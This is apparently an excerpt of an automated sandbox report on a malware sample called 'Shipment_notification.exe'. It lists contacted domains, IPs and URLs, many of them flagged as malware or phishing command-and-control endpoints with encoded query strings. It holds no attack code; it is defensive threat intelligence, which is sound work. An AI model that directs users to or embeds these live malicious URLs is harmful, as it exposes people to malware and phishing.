          http://www.peramid.xyz/rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA100%Avira URL Cloudmalware
          http://www.zzxiaoyuan.com/rs5b/10%Avira URL Cloudsafe
          http://www.zzxiaoyuan.com/rs5b/0%Avira URL Cloudsafe
          http://www.emagrecarapido.store0%Avira URL Cloudsafe
          http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU100%Avira URL Cloudphishing
          http://www.drkathleensanders.com0%Avira URL Cloudsafe
          http://www.notebook-rucksack.com0%Avira URL Cloudsafe
          http://www.drkathleensanders.com/rs5b/100%Avira URL Cloudmalware
          http://www.rubyidentity.space/rs5b/0%Avira URL Cloudsafe
          http://www.notebook-rucksack.com/rs5b/0%Avira URL Cloudsafe
          http://www.peramid.xyz/rs5b/100%Avira URL Cloudmalware
          http://www.piergitarshoes.com/rs5b/100%Avira URL Cloudmalware
          http://www.amirah.cfd100%Avira URL Cloudphishing
          http://www.amirah.cfd/rs5b/100%Avira URL Cloudmalware
          http://www.starauctioneerspro.com0%Avira URL Cloudsafe
          http://www.ywtxsm.com/rs5b/100%Avira URL Cloudmalware
          http://www.locationsbormes.com/rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/b0%Avira URL Cloudsafe
          http://www.locationsbormes.com0%Avira URL Cloudsafe
          http://www.isabellagambitta.com0%Avira URL Cloudsafe
          http://www.notebook-rucksack.com/rs5b/%0%Avira URL Cloudsafe
          http://www.kaj8tfjcmkn7.xyz/rs5b/Q0%Avira URL Cloudsafe
          http://www.rubyidentity.space0%Avira URL Cloudsafe
          http://www.carcosainvest.com0%Avira URL Cloudsafe
          http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA100%Avira URL Cloudphishing
          http://www.sajatypeworks.com.Y0%Avira URL Cloudsafe
          http://www.zzxiaoyuan.com0%Avira URL Cloudsafe
          http://www.starauctioneerspro.com/rs5b/0%Avira URL Cloudsafe
          http://www.kaj8tfjcmkn7.xyz/rs5b/0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cnv0%Avira URL Cloudsafe
          http://www.kaj8tfjcmkn7.xyz0%Avira URL Cloudsafe
          http://www.emagrecarapido.store/rs5b/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cni90%Avira URL Cloudsafe
          http://www.tcatelier.com0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cnx0%Avira URL Cloudsafe
          http://www.piergitarshoes.com0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cno0%Avira URL Cloudsafe
          http://www.tcatelier.com/rs5b/0%Avira URL Cloudsafe
          http://www.ywtxsm.com0%Avira URL Cloudsafe
          http://www.isabellagambitta.com/rs5b/100%Avira URL Cloudphishing
          http://www.ywtxsm.com/rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA100%Avira URL Cloudmalware
          http://www.peramid.xyz100%Avira URL Cloudmalware
          http://www.53876.world100%Avira URL Cloudmalware
          http://www.drkathleensanders.com/rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA100%Avira URL Cloudmalware
          http://www.53876.world/rs5b/100%Avira URL Cloudmalware
          http://www.locationsbormes.com/rs5b/100%Avira URL Cloudmalware
          http://www.carcosainvest.com/rs5b/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.peramid.xyz
          		198.177.124.57
          		truetrue
            		unknown
            carcosainvest.com
            		206.54.190.30
            		truetrue
              		unknown
              www.piergitarshoes.com
              		199.59.243.223
              		truetrue
                		unknown
                www.isabellagambitta.com
                		185.27.134.217
                		truetrue
                  		unknown
                  www.ywtxsm.com
                  		154.218.155.8
                  		truetrue
                    		unknown
                    www.drkathleensanders.com
                    		66.96.161.158
                    		truetrue
                      		unknown
                      www.locationsbormes.com
                      		45.114.105.2
                      		truetrue
                        		unknown
                        www.emagrecarapido.store
                        		unknown
                        		unknowntrue
                          		unknown
                          www.tcatelier.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.amirah.cfd
                            		unknown
                            		unknowntrue
                              		unknown
                              www.carcosainvest.com
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.piergitarshoes.com/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.peramid.xyz/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.ywtxsm.com/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.peramid.xyz/rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhAtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.drkathleensanders.com/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.locationsbormes.com/rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhAtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhAtrue
                                • Avira URL Cloud: phishing
                                		unknown
                                http://www.ywtxsm.com/rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhAtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.drkathleensanders.com/rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhAtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.locationsbormes.com/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.carcosainvest.com/rs5b/true
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.starauctioneerspro.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/chrome_newtabcontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                  		high
                                  http://www.fontbureau.com/designersGShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=10W12dX.4.drfalse
                                      		high
                                      http://www.fontbureau.com/designers/?Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/bTheShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers?Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.emagrecarapido.storeexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ywtxsm.com/rs5b/Prexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.zzxiaoyuan.com/rs5b/explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.zzxiaoyuan.com/rs5b/1explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.amirah.cfdexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          		unknown
                                          https://search.yahoo.com?fr=crmas_sfpfcontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                            		high
                                            http://www.tiro.comShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designersShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikUcontrol.exe, 00000004.00000002.582622308.0000000005388000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              http://www.drkathleensanders.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.goodfont.co.krShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.notebook-rucksack.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.carterandcone.comShipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.amirah.cfd/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.sajatypeworks.comShipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.typography.netDShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.google.comcontrol.exe, 00000004.00000002.583265968.00000000073D0000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000004.00000002.582622308.000000000583E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn/cTheShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.galapagosdesign.com/staff/dennis.htmShipment_notification.exe, 00000000.00000003.322681699.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322630345.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322651512.0000000005577000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322604070.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322780036.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://fontfabrik.comShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.notebook-rucksack.com/rs5b/explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.rubyidentity.space/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.founder.com.cn/cn/bShipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.galapagosdesign.com/DPleaseShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.isabellagambitta.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fonts.comShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.locationsbormes.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.searchvity.com/?dn=control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmptrue
                                                  • URL Reputation: malware
                                                  		unknown
                                                  http://www.rubyidentity.spaceexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleaseShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.kaj8tfjcmkn7.xyz/rs5b/Qexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.carterandcone.como.Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.sakkal.comShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zzxiaoyuan.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.carcosainvest.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.notebook-rucksack.com/rs5b/%explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sajatypeworks.com.YShipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.339413260.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.577680371.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.comShipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.starauctioneerspro.com/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icocontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                          		high
                                                          http://www.kaj8tfjcmkn7.xyzexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.zhongyicts.com.cnvShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.zhongyicts.com.cnxShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cni9Shipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.kaj8tfjcmkn7.xyz/rs5b/explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sajatypeworks.comzShipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.tcatelier.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.emagrecarapido.store/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=10W12dX.4.drfalse
                                                            		high
                                                            http://www.zhongyicts.com.cnoShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.piergitarshoes.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                              		high
                                                              http://www.fontbureau.comzanaShipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                                		high
                                                                http://www.carterandcone.comnShipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.carterandcone.comlShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.tcatelier.com/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.ywtxsm.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ac.ecosia.org/autocomplete?q=10W12dX.4.drfalse
                                                                  		high
                                                                  https://search.yahoo.com?fr=crmas_sfpcontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                                    		high
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.isabellagambitta.com/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      		unknown
                                                                      http://www.53876.worldexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://www.founder.com.cn/cnShipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316084822.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315510968.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
